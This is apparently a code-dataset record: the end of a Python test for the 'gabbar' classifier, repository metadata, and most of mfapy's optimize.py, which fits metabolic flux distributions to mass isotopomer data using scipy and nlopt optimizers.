    expected = [1.0, 0.0, 0.0, 1.0, -0.031759025332264254, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.16666666666666666, 0.0, -0.14285714285714285, -0.14285714285714285, 0.0, -0.2, 0.0, 0.3333333333333333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.15, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1257359125315391, -0.037411378145639385, 0.0, -0.2]
    actual = gabbar.normalize_features(features)
    # The original looped over expected then over actual separately, which
    # was an implicit (IndexError-based) length check; make it explicit and
    # compare pairwise once with rounding.
    assert len(actual) == len(expected)
    for got, want in zip(actual, expected):
        assert round(got, NUMBER_OF_DECIMALS) == round(want, NUMBER_OF_DECIMALS)
def test_get_prediction():
    # The trained model must classify this known normalized feature vector
    # with label 1.
    vector = [1.0, 0.0, 0.0, 1.0, -0.031759025332264254, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.16666666666666666, 0.0, -0.14285714285714285, -0.14285714285714285, 0.0, -0.2, 0.0, 0.3333333333333333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.15, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1257359125315391, -0.037411378145639385, 0.0, -0.2]
    assert gabbar.get_prediction(vector) == 1
| 92.94
| 1,179
| 0.65354
| 793
| 4,647
| 3.675914
| 0.161412
| 0.152316
| 0.193482
| 0.219554
| 0.810978
| 0.794511
| 0.794511
| 0.754717
| 0.754717
| 0.754717
| 0
| 0.175151
| 0.146116
| 4,647
| 49
| 1,180
| 94.836735
| 0.559476
| 0.029697
| 0
| 0.258065
| 0
| 0
| 0.340067
| 0.12475
| 0
| 0
| 0
| 0.020408
| 0.193548
| 1
| 0.129032
| false
| 0
| 0.096774
| 0
| 0.225806
| 0.032258
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
65fc23079caf89fef95e45b741aa768e5c9f0ba6
| 33,160
|
py
|
Python
|
mfapy/optimize.py
|
kskmaeda/mfapy
|
f7d621fe412f0f04219189db5d1bb956cdee4e9c
|
[
"MIT"
] | 9
|
2019-02-24T07:48:03.000Z
|
2021-12-28T01:11:36.000Z
|
mfapy/optimize.py
|
fumiomatsuda/mfapy
|
0d22cfe3f7fe690565d039b7bda4fb80e2bb0eb7
|
[
"MIT"
] | 2
|
2020-09-05T15:48:11.000Z
|
2022-03-19T05:21:22.000Z
|
mfapy/optimize.py
|
kskmaeda/mfapy
|
f7d621fe412f0f04219189db5d1bb956cdee4e9c
|
[
"MIT"
] | 5
|
2020-04-11T12:49:29.000Z
|
2021-09-15T14:03:10.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: optimize.py
# Purpose: low level optimizer functions used in mfapy. These functions were separated from model instance for the parallel execution.
#
# Author: Fumio_Matsuda
#
# Created: 12/06/2018
# Copyright: (c) Fumio_Matsuda 2018
# Licence: MIT license
#-------------------------------------------------------------------------------
"""optimize.py:low level optimizer functions used in mfapy.
These functions were separated from model instance for the parallel execution.
Todo:
* Cleaning-up and support other optimizers
"""
import numpy as numpy
import scipy as scipy
import nlopt as nlopt
#from numba import jit
def initializing_Rm_fitting(numbers, vectors, matrixinv, template, initial_search_iteration_max, method = "fitting"):
    """Function to generate a randomized initial flux distribution using scipy.optimize.minimize SLSQP.

    Args:
        numbers (dict): "model.numbers" including various number related data of the model.
        vectors (dict): "model.vector" including various vector related data of the model.
        matrixinv (numpy 2d array): "model.matrixinv" is an inversed matrix of the stoichiometry matrix for flux calculation.
        template (dict): Dictionary of metabolic state. When a template is available, the metabolic state most similar to the template is generated. The function is used in the grid search.
        initial_search_iteration_max (int): "configure["initial_search_iteration_max"]". Maximal number of iterations (steps) allowed in each task to find a feasible initial metabolic flux distribution.
        method (str): "fitting" is the only available method.

    Returns:
        tmp_r (list): metabolic state data (tmp_r = numpy.dot(matrixinv, Rm_temp))
        Rm_temp (list): metabolic state vector
        Rm_ind (list): independent flux vector
        state (str): finishing condition, "Failed"/"Determined"

    Examples:
        >>> tmp_r, Rm_temp, Rm_ind, state = optimize.initializing_Rm_fitting(numbers, vectors, matrixinv, template, initial_search_iteration_max)

    See Also:
        calc_protrude_scipy
    """
    # Number of independent fluxes.
    independent_number = numbers['independent_number']
    total_number = numbers['total_number']
    # Restrict MKL to a single thread: these tasks are run as parallel worker
    # processes, so per-process MKL threading would oversubscribe the CPU.
    try:
        import mkl
        mkl.set_num_threads(1)
    except ImportError:
        # BUGFIX: the original used a bare ``except:`` guarded by an
        # undefined ``callbacklevel`` variable, which raised NameError
        # whenever the optional mkl-service package was missing.
        print("mkl-service is not installed this python!")
    # Start from a zero independent-flux vector.
    Rm_ind = list(numpy.zeros(independent_number))
    # Flux boundaries.
    lb = list(vectors["lb"])
    ub = list(vectors["ub"])
    independent_lb = list(vectors["independent_lb"])
    independent_ub = list(vectors["independent_ub"])
    tmp_r = []
    result_Rm = []
    result_ind = []
    message = "Initial state"
    try:
        # Up to three attempts from different random starting points.
        for j in range(3):
            message = "Initial state"
            # Setting lower and upper boundaries.
            lb_modified = list(lb)
            ub_modified = list(ub)
            # Random initial independent vector, uniform within its bounds.
            for i in range(len(Rm_ind)):
                Rm_ind[i] = (independent_ub[i] - independent_lb[i]) * numpy.random.rand() + independent_lb[i]
            # Parameters handed to the penalty objective.
            parameters = {}
            parameters['stoichiometric_num'] = numbers['independent_start']
            parameters['reaction_num'] = numbers['independent_end']
            parameters['matrixinv'] = matrixinv
            parameters['Rm_initial'] = numpy.array(list(vectors["Rm_initial"]))
            parameters['lb'] = lb_modified
            parameters['ub'] = ub_modified
            parameters['template'] = template
            # Minimize the out-of-bounds penalty with scipy's SLSQP.
            res = scipy.optimize.minimize(calc_protrude_scipy, Rm_ind, method='SLSQP', args=(parameters,))
            result_ind = res.x
            # Alternative nlopt (LN_COBYLA) implementation, kept for reference:
            #   opt = nlopt.opt(nlopt.LN_COBYLA, independent_number)
            #   opt.set_lower_bounds(independent_lb)
            #   opt.set_upper_bounds(independent_ub)
            #   opt.set_min_objective(lambda x, grad: calc_protrude_nlopt(x, grad, parameters))
            #   opt.set_xtol_abs(0.0001)
            #   opt.set_maxeval(initial_search_iteration_max)
            #   result_ind = opt.optimize(Rm_ind)
            #   minf = opt.last_optimum_value()
            # Rebuild the full metabolic-state vector and check feasibility
            # with a small numerical tolerance.
            result_Rm = numpy.array(list(vectors["Rm_initial"]))
            result_Rm[numbers['independent_start']: numbers['independent_end']] = result_ind[:]
            tmp_r = numpy.dot(matrixinv, result_Rm)
            check = 0
            for i in range(len(tmp_r)):
                if tmp_r[i] < lb[i] - 0.0001:
                    check = check + 1
                if tmp_r[i] > ub[i] + 0.0001:
                    check = check + 1
            if check == 0:
                message = "Determined"
                break
            else:
                message = "Failed"
    except Exception as e:
        # Report the failure through the state slot instead of propagating;
        # callers inspect the returned message.
        message = e
    finally:
        # NOTE(review): ``return`` inside ``finally`` swallows any in-flight
        # exception; preserved because callers rely on the 4-tuple return.
        return (tmp_r, result_Rm, result_ind, message)
def calc_protrude_scipy(independent_flux, *args):
    """Objective function used in initializing_Rm_fitting (SLSQP).

    Calculates a penalty score for a metabolic state lying outside of the
    feasible space, or the distance from a template flux when one is given.

    Args:
        independent_flux (array): vector of independent flux
        *args (list): single extra positional argument holding the parameter
            dict with keys 'Rm_initial', 'stoichiometric_num', 'reaction_num',
            'matrixinv', 'lb', 'ub', 'template'.

    Returns:
        float: Penalty score (sum of boundary protrusions, or sum of absolute
        deviations from the template flux when 'template' is non-empty).

    See Also:
        initializing_Rm_fitting
    """
    kwargs = args[0]
    Rm_initial = kwargs['Rm_initial']
    stoichiometric_num = kwargs['stoichiometric_num']
    reaction_num = kwargs['reaction_num']
    matrixinv = kwargs['matrixinv']
    lb = kwargs['lb']
    ub = kwargs['ub']
    template = kwargs['template']
    # Reconstruct the full Rm vector with the candidate independent fluxes.
    Rm = numpy.array(list(Rm_initial))
    Rm[stoichiometric_num: reaction_num] = independent_flux[:]
    tmp_r = numpy.dot(matrixinv, Rm)
    f = 0.0
    if len(template) > 0:
        #
        # if template flux is available: fit to it directly
        #
        for i, flux in enumerate(tmp_r):
            f = f + abs(flux - template[i])
    else:
        #
        # to generate random flux: penalize only the protrusion
        # beyond the lower/upper boundary of each flux
        #
        for i, flux in enumerate(tmp_r):
            if flux > ub[i]:
                f = f + (flux - ub[i])
            elif flux < lb[i]:
                f = f + (lb[i] - flux)
    return f
def calc_protrude_nlopt(independent_flux, grad, kwargs):
    """Objective function used in initializing_Rm_fitting (nlopt).

    Calculates a penalty score for a metabolic state lying outside of the
    feasible space, or the distance from a template flux when one is given.

    Args:
        independent_flux (array): vector of independent flux
        grad: gradient slot required by the nlopt callback signature; not used
        kwargs (dict): parameter dict with keys 'Rm_initial',
            'stoichiometric_num', 'reaction_num', 'matrixinv', 'lb', 'ub',
            'template'.

    Returns:
        float: Penalty score (sum of boundary protrusions, or sum of absolute
        deviations from the template flux when 'template' is non-empty).

    See Also:
        initializing_Rm_fitting
    """
    Rm_initial = kwargs['Rm_initial']
    stoichiometric_num = kwargs['stoichiometric_num']
    reaction_num = kwargs['reaction_num']
    matrixinv = kwargs['matrixinv']
    lb = kwargs['lb']
    ub = kwargs['ub']
    template = kwargs['template']
    # Reconstruct the full Rm vector with the candidate independent fluxes.
    Rm = numpy.array(list(Rm_initial))
    Rm[stoichiometric_num: reaction_num] = independent_flux[:]
    tmp_r = numpy.dot(matrixinv, Rm)
    f = 0.0
    if len(template) > 0:
        #
        # if template flux is available: fit to it directly
        #
        for i, flux in enumerate(tmp_r):
            f = f + abs(flux - template[i])
    else:
        #
        # to generate random flux: penalize only the protrusion
        # beyond the lower/upper boundary of each flux
        #
        for i, flux in enumerate(tmp_r):
            if flux > ub[i]:
                f = f + (flux - ub[i])
            elif flux < lb[i]:
                f = f + (lb[i] - flux)
    return f
def calc_MDV_from_flux(tmp_r, target_fragments, mdv_carbon_sources, func, timepoint = [], y0temp = []):
    """Low level function to calculate an MDV vector and MDV hash from a
    metabolic flux distribution and carbon source MDVs using calmdv/diffmdv.

    This function is called from mfapy.metabolicmodel.show_results.

    Args:
        tmp_r (array): metabolic state vector (tmp_r = numpy.dot(matrixinv, Rm_temp)).
        target_fragments (array): target MDV names for the calculation, e.g. model.target_fragments.keys().
        mdv_carbon_sources (dict): model.experiments[ex_id]['mdv_carbon_sources'].
        func (dict): dict of functions for MDV calculation in model.func.
        timepoint (array): INST mode only; time points for MDV comparison.
            A non-empty array switches the calculation to INST mode.
        y0temp (dict): start IDV state for INST mode.

    Returns:
        13C-MFA mode:
            * mdv (array) list of MDV data
            * mdv_hash (dict) dict of MDV data
        INST-MFA mode:
            * mdv (array) array of mdv at each time point
            * mdv_hash (array) array of mdv_hash at each time point

    Example:
        >>> mdv_exp, mdv_hash = optimize.calc_MDV_from_flux(tmp_r, target_fragments_temp, mdv_carbon_sources_temp, self.func)

    See Also:
        mfapy.metabolicmodel.show_results
    """
    fragments = sorted(target_fragments)
    if len(timepoint) > 0:
        # Isotopically nonstationary (INST) mode
        mdv, mdv_hash = func["diffmdv"](tmp_r, [], timepoint, fragments, mdv_carbon_sources, y0temp)
        return mdv, mdv_hash
    # Metabolically stationary (13C-MFA) mode
    mdv, mdv_hash = func["calmdv"](tmp_r, fragments, mdv_carbon_sources)
    return mdv, mdv_hash
def fit_r_mdv_scipy(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "SLSQP"):
    """Low level function for model fitting using scipy.optimize.minimize.

    Args:
        configure (dict): "model.configures" including various configurations of the model.
        experiments (dict): "model.experiments" including experiments defined in the model.
        numbers (dict): "model.numbers" including various numbers of the model.
        vectors (dict): "model.vector" including various vectors of the model.
        matrixinv (2d array): "model.matrixinv", an inversed matrix for the flux calculation.
        func (dict): dict of functions for MDV calculation in model.func. A string of
            Python source defining calmdv/diffmdv is also accepted.
        flux (dict): dictionary of the initial metabolic state. A flat flux vector is
            also accepted.
        method (str): "SLSQP" and "COBYLA" are available. Any other value falls back
            to "SLSQP".

    Returns:
        * state (str) finishing condition (the exception object on failure)
        * kai (float) residual sum of squares of the fitted metabolic state (-1.0 on failure)
        * opt_flux (array) list of the fitted metabolic state
        * Rm_ind_sol (array) list of the fitted independent fluxes

    Example:
        >>> state, kai, opt_flux, Rm_ind_sol = optimize.fit_r_mdv_scipy(configure, self.experiments, numbers, vectors, self.matrixinv, self.func, flux, method = "SLSQP")

    See Also:
        calc_MDV_residue_scipy
    """
    if isinstance(func, dict):
        calmdv = func["calmdv"]
        diffmdv = func["diffmdv"]
    else:
        # func was given as source text: compile it to obtain calmdv/diffmdv.
        # NOTE(review): exec is only acceptable for trusted, model-generated code.
        locals_dic = locals()
        exec(func, globals(), locals_dic)
        calmdv = locals_dic["calmdv"]
        diffmdv = locals_dic["diffmdv"]
    # Maximum number of optimizer iterations
    if 'iteration_max' in configure:
        iteration_max = configure['iteration_max']
    else:
        iteration_max = 1000
    # Verbosity of progress output
    if 'callbacklevel' in configure:
        callbacklevel = configure['callbacklevel']
    else:
        callbacklevel = 0
    #
    # Restrict MKL to a single thread (mkl-service is optional)
    #
    try:
        import mkl
        mkl.set_num_threads(1)
    except:
        if callbacklevel > 1:
            print("mkl-service is not installed this python!")
    #
    # Initial state
    #
    state = "Initial state"
    kai = -1.0
    opt_flux = []
    result_ind = []
    try:
        # number of independent fluxes and their slice within the Rm vector
        independent_number = numbers['independent_number']
        ind_start = numbers['independent_start']
        ind_end = numbers['independent_end']
        # initial independent flux vector taken from the given metabolic state
        if isinstance(flux, dict):
            Rm_ind = [flux[group][id]["value"] for (group, id) in vectors['independent_flux']]
        else:
            Rm_ind = [flux[i] for i in vectors['independent_flux_position']]
        # boundaries
        lb = list(vectors["lb"])
        ub = list(vectors["ub"])
        independent_lb = list(vectors["independent_lb"])
        independent_ub = list(vectors["independent_ub"])
        #
        # Generate MDV vector of all defined experiments
        #
        mdv_exp_original = list(vectors["value"])
        mdv_std_original = list(vectors["stdev"])
        mdv_use = list(vectors["use"])
        for experiment in sorted(experiments.keys()):
            mdv_exp_original.extend(experiments[experiment]['mdv_exp_original'])
            mdv_std_original.extend(experiments[experiment]['mdv_std_original'])
            mdv_use.extend(experiments[experiment]['mdv_use'])
        mdv_exp = numpy.array([y for x, y in enumerate(mdv_exp_original) if mdv_use[x] != 0])
        spectrum_std = numpy.array([y for x, y in enumerate(mdv_std_original) if mdv_use[x] != 0])
        #
        # Inversed covariance matrix (diagonal, 1/sigma^2 weights)
        #
        covinv = numpy.zeros((len(spectrum_std), len(spectrum_std)))
        for i, std in enumerate(spectrum_std):
            covinv[i, i] = 1.0 / (std ** 2)
        state = {'text': "Function was called", 'value': 7}
        ##################################################################
        if (callbacklevel >= 4):
            print("Fitting Start in fit_r_mdv_scipy using ", method)
        # Parameter bundle forwarded to the objective function
        parameters = {}
        parameters['stoichiometric_num'] = ind_start
        parameters['reaction_num'] = ind_end
        parameters['matrixinv'] = matrixinv
        parameters['experiments'] = experiments
        parameters['mdv_exp'] = mdv_exp
        parameters['mdv_use'] = mdv_use
        parameters['covinv'] = covinv
        parameters['Rm_initial'] = numpy.array(list(vectors["Rm_initial"]))
        parameters['lb'] = lb
        parameters['ub'] = ub
        parameters['calmdv'] = calmdv
        parameters['diffmdv'] = diffmdv
        parameters['callbacklevel'] = callbacklevel
        # Box constraints on the independent fluxes (not used by COBYLA)
        bounds = []
        for i in range(independent_number):
            bounds.append((independent_lb[i], independent_ub[i]))
        if method == "COBYLA":
            options = {'tol': 0.000000001, 'maxiter': iteration_max}
            res = scipy.optimize.minimize(calc_MDV_residue_scipy, Rm_ind, options = options, method = "COBYLA", args = (parameters,))
        else:
            # "SLSQP" and any unrecognized method name fall back to SLSQP
            options = {'ftol': 0.000000001, 'maxiter': iteration_max}
            res = scipy.optimize.minimize(calc_MDV_residue_scipy, Rm_ind, bounds = bounds, options = options, method = "SLSQP", args = (parameters,))
        # Optimized independent flux vector
        result_ind = res.x
        # RSS
        kai = res.fun
        # State of optimizer
        state = res.message
        if (callbacklevel >= 4):
            print("Fitting was successfully finished. RSS = ", kai)
        # Reconstruct the full metabolic state from the fitted independent fluxes
        result_Rm = numpy.array(list(vectors["Rm_initial"]))
        result_Rm[numbers['independent_start']: numbers['independent_end']] = result_ind[:]
        opt_flux = numpy.dot(matrixinv, numpy.array(result_Rm))
    except Exception as e:
        # NOTE(review): the exception object itself is returned as "state"
        state = e
    finally:
        return(state, kai, opt_flux, result_ind)
def fit_r_mdv_nlopt(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "LN_PRAXIS"):
    """Low level function for model fitting using nlopt.opt.

    Args:
        configure (dict): "model.configures" including various configurations of the model.
        experiments (dict): "model.experiments" including experiments defined in the model.
        numbers (dict): "model.numbers" including various numbers of the model.
        vectors (dict): "model.vector" including various vectors of the model.
        matrixinv (2d array): "model.matrixinv", an inversed matrix for the flux calculation.
        func (dict): dict of functions for MDV calculation in model.func. A string of
            Python source defining calmdv/diffmdv is also accepted.
        flux (dict): dictionary of the initial metabolic state. A flat flux vector is
            also accepted.
        method (str): "LN_COBYLA", "LN_BOBYQA", "LN_NEWUOA", "LN_PRAXIS", "LN_SBPLX",
            "LN_NELDERMEAD", "GN_DIRECT_L", "GN_CRS2_LM", "GN_ESCH". Any other value
            falls back to "LN_COBYLA".

    Returns:
        * state (str) finishing condition (the exception object on failure)
        * kai (float) residual sum of squares of the fitted metabolic state (-1.0 on failure)
        * opt_flux (array) list of the fitted metabolic state
        * Rm_ind_sol (array) list of the fitted independent fluxes

    Example:
        >>> state, kai, opt_flux, Rm_ind_sol = optimize.fit_r_mdv_nlopt(configure, self.experiments, numbers, vectors, self.matrixinv, self.func, flux, method = "LN_PRAXIS")

    See Also:
        calc_MDV_residue_nlopt
    """
    if isinstance(func, dict):
        calmdv = func["calmdv"]
        diffmdv = func["diffmdv"]
    else:
        # func was given as source text: compile it to obtain calmdv/diffmdv.
        # NOTE(review): exec is only acceptable for trusted, model-generated code.
        locals_dic = locals()
        exec(func, globals(), locals_dic)
        calmdv = locals_dic["calmdv"]
        diffmdv = locals_dic["diffmdv"]
    # Maximum number of optimizer evaluations
    if 'iteration_max' in configure:
        iteration_max = configure['iteration_max']
    else:
        iteration_max = 1000
    # Verbosity of progress output
    if 'callbacklevel' in configure:
        callbacklevel = configure['callbacklevel']
    else:
        callbacklevel = 0
    #
    # Restrict MKL to a single thread (mkl-service is optional)
    #
    try:
        import mkl
        mkl.set_num_threads(1)
    except:
        if callbacklevel > 1:
            print("mkl-service is not installed this python!")
    #
    # Initial state
    #
    state = "Initial state"
    kai = -1.0
    opt_flux = []
    result_ind = []
    try:
        # number of independent fluxes and their slice within the Rm vector
        independent_number = numbers['independent_number']
        ind_start = numbers['independent_start']
        ind_end = numbers['independent_end']
        # initial independent flux vector taken from the given metabolic state
        if isinstance(flux, dict):
            Rm_ind = [flux[group][id]["value"] for (group, id) in vectors['independent_flux']]
        else:
            Rm_ind = [flux[i] for i in vectors['independent_flux_position']]
        # boundaries
        lb = list(vectors["lb"])
        ub = list(vectors["ub"])
        independent_lb = list(vectors["independent_lb"])
        independent_ub = list(vectors["independent_ub"])
        #
        # Generate MDV vector of all defined experiments
        #
        mdv_exp_original = list(vectors["value"])
        mdv_std_original = list(vectors["stdev"])
        mdv_use = list(vectors["use"])
        for experiment in sorted(experiments.keys()):
            mdv_exp_original.extend(experiments[experiment]['mdv_exp_original'])
            mdv_std_original.extend(experiments[experiment]['mdv_std_original'])
            mdv_use.extend(experiments[experiment]['mdv_use'])
        mdv_exp = numpy.array([y for x, y in enumerate(mdv_exp_original) if mdv_use[x] != 0])
        spectrum_std = numpy.array([y for x, y in enumerate(mdv_std_original) if mdv_use[x] != 0])
        #
        # Inversed covariance matrix (diagonal, 1/sigma^2 weights)
        #
        covinv = numpy.zeros((len(spectrum_std), len(spectrum_std)))
        for i, std in enumerate(spectrum_std):
            covinv[i, i] = 1.0 / (std ** 2)
        state = {'text': "Function was called", 'value': 7}
        ##################################################################
        if (callbacklevel >= 4):
            print("Fitting Start in fit_r_mdv_nlopt using ", method)
        # Parameter bundle forwarded to the objective function
        parameters = {}
        parameters['stoichiometric_num'] = ind_start
        parameters['reaction_num'] = ind_end
        parameters['matrixinv'] = matrixinv
        parameters['experiments'] = experiments
        parameters['mdv_exp'] = mdv_exp
        parameters['mdv_use'] = mdv_use
        parameters['covinv'] = covinv
        parameters['Rm_initial'] = numpy.array(list(vectors["Rm_initial"]))
        parameters['lb'] = lb
        parameters['ub'] = ub
        parameters['calmdv'] = calmdv
        parameters['diffmdv'] = diffmdv
        parameters['callbacklevel'] = callbacklevel
        #
        # nlopt algorithm selection; unknown names fall back to LN_COBYLA
        #
        supported_methods = ("LN_COBYLA", "LN_BOBYQA", "LN_NEWUOA", "LN_PRAXIS",
                             "LN_SBPLX", "LN_NELDERMEAD", "GN_DIRECT_L",
                             "GN_CRS2_LM", "GN_ESCH")
        if method in supported_methods:
            algorithm = getattr(nlopt, method)
        else:
            algorithm = nlopt.LN_COBYLA
        opt = nlopt.opt(algorithm, independent_number)
        opt.set_xtol_abs(0.000001)
        opt.set_maxeval(iteration_max)
        opt.set_lower_bounds(independent_lb)
        opt.set_upper_bounds(independent_ub)
        opt.set_min_objective(lambda x, grad: calc_MDV_residue_nlopt(x, grad, parameters))
        #
        # Optimization
        #
        result_ind = opt.optimize(Rm_ind)
        kai = opt.last_optimum_value()
        if (callbacklevel >= 4):
            print("Fitting was successfully finished. RSS = ", kai)
        # Reconstruct the full metabolic state from the fitted independent fluxes
        result_Rm = numpy.array(list(vectors["Rm_initial"]))
        result_Rm[numbers['independent_start']: numbers['independent_end']] = result_ind[:]
        opt_flux = numpy.dot(matrixinv, numpy.array(result_Rm))
    except Exception as e:
        # NOTE(review): the exception object itself is returned as "state"
        state = e
    finally:
        return(state, kai, opt_flux, result_ind)
def fit_r_mdv_deep(configure, experiments, numbers, vectors, matrixinv, func, flux):
    """Low level function for model fitting by iterative fittings.

    * 1st iteration: GN_CRS2_LM (global optimizer)
    * 2n th iterations: SLSQP (local)
    * 2n + 1 th iterations: LN_PRAXIS (local)

    This combination is empirically best.

    Args:
        configure (dict): "model.configures" including various configurations of the model.
        experiments (dict): "model.experiments" including experiments defined in the model.
        numbers (dict): "model.numbers" including various numbers of the model.
        vectors (dict): "model.vector" including various vectors of the model.
        matrixinv (2d array): "model.matrixinv", an inversed matrix for the flux calculation.
        func (dict): dict of functions for MDV calculation in model.func.
        flux (dict): dictionary of the initial metabolic state.

    Returns:
        * state (str) finishing condition
        * kai (float) residual sum of squares of the fitted metabolic state
        * opt_flux (array) list of the fitted metabolic state
        * Rm_ind_sol (array) list of the fitted independent fluxes

    Example:
        >>> state, kai, opt_flux, Rm_ind_sol = optimize.fit_r_deep(configure, self.experiments, numbers, vectors, self.matrixinv, self.func, flux)

    See Also:
        optimize.fit_r_mdv_nlopt
        optimize.fit_r_mdv_scipy
    """
    # Number of SLSQP + LN_PRAXIS refinement rounds after the global search
    if 'number_of_repeat' in configure:
        number_of_repeat = configure['number_of_repeat']
    else:
        number_of_repeat = 3
    # Verbosity of progress output
    if 'callbacklevel' in configure:
        callbacklevel = configure['callbacklevel']
    else:
        callbacklevel = 0
    if (callbacklevel >= 4):
        print("##Start GN_CRS2_LM method######################################################################")
    # Global search first; its result seeds the local refinements below.
    state, kai, flux, Rm_ind_sol = fit_r_mdv_nlopt(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "GN_CRS2_LM")
    for k in range(number_of_repeat):
        if (callbacklevel >= 4):
            print("Deep", k, "Start SLSQP method######################################################################")
        state, kai, flux, Rm_ind_sol = fit_r_mdv_scipy(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "SLSQP")
        if (callbacklevel >= 4):
            print("Deep", k, "Start LN_PRAXIS method##################################################################")
        state, kai, flux, Rm_ind_sol = fit_r_mdv_nlopt(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "LN_PRAXIS")
    return(state, kai, flux, Rm_ind_sol)
def calc_MDV_residue_scipy(x, *args):
    """Low level function for residual sum of squares calculation for model
    fitting using scipy.optimize.minimize.

    Args:
        x (array): vector of independent flux.
        *args (array): single extra positional argument holding the parameter
            dict prepared by fit_r_mdv_scipy.

    Returns:
        float: RSS + penalty score (when the flux vector lies outside of the
        lower and upper boundaries).

    See Also:
        fit_r_mdv_scipy
    """
    kwargs = args[0]
    Rm_initial = kwargs['Rm_initial']
    stoichiometric_num = kwargs['stoichiometric_num']
    reaction_num = kwargs['reaction_num']
    matrixinv = kwargs['matrixinv']
    experiments = kwargs['experiments']
    mdv_exp = numpy.array(kwargs['mdv_exp'])
    mdv_use = kwargs['mdv_use']
    covinv = kwargs['covinv']
    lb = kwargs['lb']
    ub = kwargs['ub']
    calmdv = kwargs['calmdv']
    diffmdv = kwargs['diffmdv']
    callbacklevel = kwargs['callbacklevel']
    # Reconstruct the full flux vector from the independent fluxes.
    Rm = numpy.array(list(Rm_initial))
    Rm[stoichiometric_num: reaction_num] = list(x)
    tmp_r = numpy.dot(matrixinv, Rm)
    # Boundary penalty: 100000 per unit of protrusion beyond lb/ub.
    g = numpy.hstack((numpy.array(lb) - tmp_r, tmp_r - numpy.array(ub)))
    penalty = 0.0
    for violation in g:
        if violation > 0:
            penalty = penalty + violation * 100000
    # Determination of MDV
    mdv_original = list(tmp_r)
    for experiment in sorted(experiments.keys()):
        target_emu_list = experiments[experiment]['target_emu_list']
        mdv_carbon_sources = experiments[experiment]['mdv_carbon_sources']
        if experiments[experiment]['mode'] == "ST":
            mdv_original_temp, mdv_hash = calmdv(list(tmp_r), target_emu_list, mdv_carbon_sources)
        elif experiments[experiment]['mode'] == "INST":
            y0temp = experiments[experiment]['y0']
            timepoints = experiments[experiment]['timepoint']
            mdv_original_temp, mdv_hash = diffmdv(list(tmp_r), [], timepoints, target_emu_list, mdv_carbon_sources, y0temp)
        mdv_original.extend(mdv_original_temp)
    mdv = numpy.array([y for i, y in enumerate(mdv_original) if mdv_use[i] != 0])
    res = mdv_exp - mdv
    f = numpy.dot(res, numpy.dot(covinv, res))
    # NOTE(review): this only inspects the mode of the LAST experiment in
    # sorted order -- confirm whether the RSS print was meant to be unconditional.
    if experiments[experiment]['mode'] == "INST":
        if callbacklevel >= 2:
            print("RSS:", f)
    return f + penalty
def calc_MDV_residue_nlopt(x, grad, kwargs):
    """Low level function for residual sum of squares calculation for model
    fitting using nlopt.

    Args:
        x (array): vector of independent flux.
        grad: gradient slot required by the nlopt callback signature; not used.
        kwargs (dict): parameter dict prepared by fit_r_mdv_nlopt.

    Returns:
        float: RSS + penalty score (when the flux vector lies outside of the
        lower and upper boundaries).

    See Also:
        fit_r_mdv_nlopt
    """
    Rm_initial = kwargs['Rm_initial']
    stoichiometric_num = kwargs['stoichiometric_num']
    reaction_num = kwargs['reaction_num']
    matrixinv = kwargs['matrixinv']
    experiments = kwargs['experiments']
    mdv_exp = numpy.array(kwargs['mdv_exp'])
    mdv_use = kwargs['mdv_use']
    covinv = kwargs['covinv']
    lb = kwargs['lb']
    ub = kwargs['ub']
    calmdv = kwargs['calmdv']
    diffmdv = kwargs['diffmdv']
    callbacklevel = kwargs['callbacklevel']
    # Reconstruct the full flux vector from the independent fluxes.
    Rm = numpy.array(list(Rm_initial))
    Rm[stoichiometric_num: reaction_num] = list(x)
    tmp_r = numpy.dot(matrixinv, Rm)
    # Boundary penalty: 100000 per unit of protrusion beyond lb/ub.
    g = numpy.hstack((numpy.array(lb) - tmp_r, tmp_r - numpy.array(ub)))
    penalty = 0.0
    for violation in g:
        if violation > 0:
            penalty = penalty + violation * 100000
    # Determination of MDV
    mdv_original = list(tmp_r)
    for experiment in sorted(experiments.keys()):
        target_emu_list = experiments[experiment]['target_emu_list']
        mdv_carbon_sources = experiments[experiment]['mdv_carbon_sources']
        if experiments[experiment]['mode'] == "ST":
            mdv_original_temp, mdv_hash = calmdv(list(tmp_r), target_emu_list, mdv_carbon_sources)
        elif experiments[experiment]['mode'] == "INST":
            y0temp = experiments[experiment]['y0']
            timepoints = experiments[experiment]['timepoint']
            mdv_original_temp, mdv_hash = diffmdv(list(tmp_r), [], timepoints, target_emu_list, mdv_carbon_sources, y0temp)
        mdv_original.extend(mdv_original_temp)
    mdv = numpy.array([y for i, y in enumerate(mdv_original) if mdv_use[i] != 0])
    res = mdv_exp - mdv
    f = numpy.dot(res, numpy.dot(covinv, res))
    # NOTE(review): this only inspects the mode of the LAST experiment in
    # sorted order -- confirm whether the RSS print was meant to be unconditional.
    if experiments[experiment]['mode'] == "INST":
        if callbacklevel >= 4:
            print("RSS:", f)
    return f + penalty
def calc_MDV_residue(x, *args, **kwargs):
    """Low level function for residual sum of squares calculation from
    mfapy.metabolicmodel.MetabolicModel.calc_rss.

    Args:
        x (array): vector of independent flux.
        *args (array): unused; accepted for signature compatibility.
        **kwargs (dict): parameters ('Rm_initial', 'stoichiometric_num',
            'reaction_num', 'matrixinv', 'experiments', 'mdv_exp', 'mdv_use',
            'covinv', 'lb', 'ub', 'calmdv', 'diffmdv', 'callbacklevel').

